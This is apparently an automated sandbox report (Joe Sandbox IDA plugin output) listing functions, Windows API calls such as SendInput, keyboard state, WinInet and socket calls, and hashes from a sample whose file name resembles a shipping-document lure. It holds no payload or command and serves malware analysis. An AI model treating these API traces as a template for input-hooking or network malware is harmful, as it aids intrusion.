GetKeyboardState.USER32(?,00000000,?,00000001), ref: 006C3966
SetKeyboardState.USER32(00000080,?,00000001), ref: 006C3982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 006C39EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 006C3A4D

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 695ea64b4b1f33524036204bb018475d70656ac09e07e04a8c03152e9dc8530d
Instruction ID: 5b8e4a001d9bcdcddc515f1cbc81d3f4f7c44b9cdb8499ebe208632eb962b97c
Opcode Fuzzy Hash: 695ea64b4b1f33524036204bb018475d70656ac09e07e04a8c03152e9dc8530d
Instruction Fuzzy Hash: 77411970A04268AAEF308BA48815FFDBBB7DB59310F04815EF8C1663C1DBB48E95D765

Function 006EB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006EB5D1

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 07efd0705c35243155d3ddce9c46bce74f295931eaddee8fb159ca83693f3751
Instruction ID: 5fcd24261c0f50d27402a5fe0659b5ca6a1671604c0e491f8bc53b3f7cdd5c80
Opcode Fuzzy Hash: 07efd0705c35243155d3ddce9c46bce74f295931eaddee8fb159ca83693f3751
Instruction Fuzzy Hash: E2311074603384EBEF209F5ACC89FEA7766AB06350F649102FA41D62E1CB74E9408B56

Function 006ED7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 006ED807
GetWindowRect.USER32(?,?), ref: 006ED87D
PtInRect.USER32(?,?,006EED5A), ref: 006ED88D
MessageBeep.USER32(00000000), ref: 006ED8FE

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 5a601de6c9b0119ca817547f194bb3e888e67e048ab808b5530fe53271305d3c
Instruction ID: baf966760367be13b85dc02d0b41a1028f8c3c323666de481572a6f0749e5b36
Opcode Fuzzy Hash: 5a601de6c9b0119ca817547f194bb3e888e67e048ab808b5530fe53271305d3c
Instruction Fuzzy Hash: 9741AD74A01398DFCB11DF5AC884BAABBF6FB45350F1982AAE8148F261D730E945CB41

Function 006C3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 006C3AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 006C3AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 006C3B34
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 006C3B92

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 97bc6b36a2d85fa8d9825ae0c8cd62b6bed61a04ea189a6528581d36f917c979
Instruction ID: 224b4e8800fb660fb486a0e8837bd17ade63c3c08d48fae2ad2279e160349a03
Opcode Fuzzy Hash: 97bc6b36a2d85fa8d9825ae0c8cd62b6bed61a04ea189a6528581d36f917c979
Instruction Fuzzy Hash: 98311470900368AEEB309BA48829FFD7BB7DB65310F04825EE881A33D1CB759E45D765

Function 006B4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006B4038
__isleadbyte_l.LIBCMT ref: 006B4066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 006B4094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 006B40CA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: ac14aea874ba09c2ca344f6605c8fe7ce8eecde4052f6e4daba42c3a3453f98a
Instruction ID: 7d94fa9e887c7b63e9bed7b66fce76e37ddc383503202688fc35847ce2782b42
Opcode Fuzzy Hash: ac14aea874ba09c2ca344f6605c8fe7ce8eecde4052f6e4daba42c3a3453f98a
Instruction Fuzzy Hash: 8031A371500215EFDB21AF64C844BFA7BA6BF41310F154518EA5587292DF31DCD1DB90

Function 006E7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 006E7CB9

Part of subcall function 006C5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 006C5F6F
Part of subcall function 006C5F55: GetCurrentThreadId.KERNEL32 ref: 006C5F76
Part of subcall function 006C5F55: AttachThreadInput.USER32(00000000,?,006C781F), ref: 006C5F7D

GetCaretPos.USER32(?), ref: 006E7CCA
ClientToScreen.USER32(00000000,?), ref: 006E7D03
GetForegroundWindow.USER32 ref: 006E7D09

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 323226ee70b44a9470b9bcbf204b99527c8ae36cf579ca60a6c5d5bd155ff899
Instruction ID: bc8dc4a065f8f41625825b4a73661e0f386e9b1e64499fb464220098a65b9132
Opcode Fuzzy Hash: 323226ee70b44a9470b9bcbf204b99527c8ae36cf579ca60a6c5d5bd155ff899
Instruction Fuzzy Hash: F7312D72900108AFDB51EFA9CC419EFBBFEEF58310B10806AF815E3211DA319E018BA4

Function 006EF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069B34E: GetWindowLongW.USER32(?,000000EB), ref: 0069B35F

GetCursorPos.USER32(?), ref: 006EF211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006FE4C0,?,?,?,?,?), ref: 006EF226
GetCursorPos.USER32(?), ref: 006EF270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006FE4C0,?,?,?), ref: 006EF2A6

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: dace5ec9988c4871f9b85ebf68aeb2a575fa76901257dda930cd50a2b0aced7b
Instruction ID: 2802a78c2cae700d41a7b5bb8f126063871c3c71a8d1caf96529b21687d49ad1
Opcode Fuzzy Hash: dace5ec9988c4871f9b85ebf68aeb2a575fa76901257dda930cd50a2b0aced7b
Instruction Fuzzy Hash: C021B139601218EFCB259FD5DC58EEE7BBAEF0A310F048069FA05472A1DB359E51DB50

Function 006D431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006D4358

Part of subcall function 006D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006D4401
Part of subcall function 006D43E2: InternetCloseHandle.WININET(00000000), ref: 006D449E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: ad992fc9584ac16b3fe429fbaffaa369e25648990c4132cf9d540f2d1b9a0e68
Instruction ID: 5e81f3329b02c63c27dd140385f36b776d3492faa6f622cb7181c8b42631507a
Opcode Fuzzy Hash: ad992fc9584ac16b3fe429fbaffaa369e25648990c4132cf9d540f2d1b9a0e68
Instruction Fuzzy Hash: F321CF31A00701BBEB219FA59C00FBBB7AAFF84710F05411BBA1596750DF719C219BA4

Function 006D8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 006D8AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 006D8AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 006D8AFF
WSAGetLastError.WSOCK32(00000000), ref: 006D8B16

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 6143815fdda1a4d060e9511470379ef40f105e5fe960952567b78e39f4a336ab
Instruction ID: 0c0846f708cae65aee575f6705c4d0e8c1e384b39731f36d0b64dea1e7c2e071
Opcode Fuzzy Hash: 6143815fdda1a4d060e9511470379ef40f105e5fe960952567b78e39f4a336ab
Instruction Fuzzy Hash: 62218172A00124AFC7619F68C895A9EBBEDEF49320F00816AF849D7290DB74DE418B94

Function 006E8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 006E8AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 006E8AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 006E8ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006E8ADC

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 19f61c206431ed14d231eed2087e3c6c88bed593cfcca656dc7f776daa915838
Instruction ID: 3d05641311653eab683f5e2a9c8232bc8837d8fce81ed288ca1e36e3b63c022c
Opcode Fuzzy Hash: 19f61c206431ed14d231eed2087e3c6c88bed593cfcca656dc7f776daa915838
Instruction Fuzzy Hash: AF11D331246251AFD754AB58CC15FBA779AFF85320F148219F92AC72E2CF74AD018798

Function 006C0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,006C0ABB,?,?,?,006C187A,00000000,000000EF,00000119,?,?), ref: 006C1E77
Part of subcall function 006C1E68: lstrcpyW.KERNEL32(00000000,?,?,006C0ABB,?,?,?,006C187A,00000000,000000EF,00000119,?,?,00000000), ref: 006C1E9D
Part of subcall function 006C1E68: lstrcmpiW.KERNEL32(00000000,?,006C0ABB,?,?,?,006C187A,00000000,000000EF,00000119,?,?), ref: 006C1ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,006C187A,00000000,000000EF,00000119,?,?,00000000), ref: 006C0AD4
lstrcpyW.KERNEL32(00000000,?,?,006C187A,00000000,000000EF,00000119,?,?,00000000), ref: 006C0AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,006C187A,00000000,000000EF,00000119,?,?,00000000), ref: 006C0B2E

Strings

cdecl, xrefs: 006C0B25

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 91d098d4e4bfab47b941aa67705bdbefb0f4c78bdf8c00820301f455711990a0
Instruction ID: 88fc3f15e33bbfa4e9e0a69812c8cc997c298ca59769d55fe42914b281faf1fb
Opcode Fuzzy Hash: 91d098d4e4bfab47b941aa67705bdbefb0f4c78bdf8c00820301f455711990a0
Instruction Fuzzy Hash: 7711B43A100305EFDB259F64DC05E7A77AAFF49310B80812EE906CB251EB719C51C7A4

Function 006B2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006B2FB5

Part of subcall function 006A395C: __FF_MSGBANNER.LIBCMT ref: 006A3973
Part of subcall function 006A395C: __NMSG_WRITE.LIBCMT ref: 006A397A
Part of subcall function 006A395C: RtlAllocateHeap.NTDLL(00C90000,00000000,00000001,00000001,00000000,?,?,0069F507,?,0000000E), ref: 006A399F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: f7b72fd6e21893b8bebd66a512a8216ca0c5c2a837082db02e3a246190d87107
Instruction ID: eb4a84580e4d5cdf5af9c226540233ad94827186e7496e352cff0fd3d5df95eb
Opcode Fuzzy Hash: f7b72fd6e21893b8bebd66a512a8216ca0c5c2a837082db02e3a246190d87107
Instruction Fuzzy Hash: AD11C871549226AFCB313F74AC146EA7B9AAF06360F208519F8099A351DB34CD818B98

Function 006C058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006C05AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006C05C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006C05DD
FreeLibrary.KERNEL32(?), ref: 006C0632

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 43717ccb7ce0d523cd164652460ad11aa3b93639e69e49d5e3e80be4b841faee
Instruction ID: f328b605ec1bee082cc12bf7eda5c2b1bfe17ef359c0ed1bead3c277b0e65c6d
Opcode Fuzzy Hash: 43717ccb7ce0d523cd164652460ad11aa3b93639e69e49d5e3e80be4b841faee
Instruction Fuzzy Hash: 3B216A71900309EBEB20CF92DC98FEABBBAEF40700F00856EE516A2150DB74EA55DF50

Function 006C6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006C6733
_memset.LIBCMT ref: 006C6754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006C67A6
CloseHandle.KERNEL32(00000000), ref: 006C67AF

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: d186693cb781bfd352e7bf05ba81a9b2813b7812472a607cbdead396fe751ac5
Instruction ID: d9082842879b48a66f0d4e8528e8da55a0c9d434219320488046abfd5ac441ad
Opcode Fuzzy Hash: d186693cb781bfd352e7bf05ba81a9b2813b7812472a607cbdead396fe751ac5
Instruction Fuzzy Hash: D4110A76901228BAE73067A5AC4DFEBBABCEF44724F10469AF504E71C0D6744E808B78

Function 006BB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006BAA79
Part of subcall function 006BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006BAA83
Part of subcall function 006BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006BAA92
Part of subcall function 006BAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006BAA99
Part of subcall function 006BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006BAAAF

GetLengthSid.ADVAPI32(?,00000000,006BADE4,?,?), ref: 006BB21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 006BB227
HeapAlloc.KERNEL32(00000000), ref: 006BB22E
CopySid.ADVAPI32(?,00000000,?), ref: 006BB247

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: c1c655c68d463fe8d428e678777088d21d497d44aeb20b91a9eb2fb26bf66d83
Instruction ID: 9ebdbdc908036c58c44e3aba9348aa85372b8de23e0f6c28bda6022abce9f0d0
Opcode Fuzzy Hash: c1c655c68d463fe8d428e678777088d21d497d44aeb20b91a9eb2fb26bf66d83
Instruction Fuzzy Hash: 351191B1A00205EFDB149F98DC95AFEB7AAEF85304F14902DEA4297314DB75AE84CB14

Function 006BB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 006BB498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006BB4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006BB4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006BB4DB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c65b33a59e2bdd23c58ab5c1dd6cd83f1e52ead9d1e7616041eb6c1903866621
Instruction ID: 18c05f1efad46c11c5e6c5c65b1e8abc1a2a8dc6c33372bca39f0f9bbf698626
Opcode Fuzzy Hash: c65b33a59e2bdd23c58ab5c1dd6cd83f1e52ead9d1e7616041eb6c1903866621
Instruction Fuzzy Hash: A6115A7A900218FFDB11DFA8C981EDDBBB5FB08700F204091E604B7294D771AE51DB94

Function 0069B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0069B34E: GetWindowLongW.USER32(?,000000EB), ref: 0069B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0069B5A5
GetClientRect.USER32(?,?), ref: 006FE69A
GetCursorPos.USER32(?), ref: 006FE6A4
ScreenToClient.USER32(?,?), ref: 006FE6AF

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 0db07bf6901c805b70ecfa70299210f07e28e2708b179d087fc4ca468d09c882
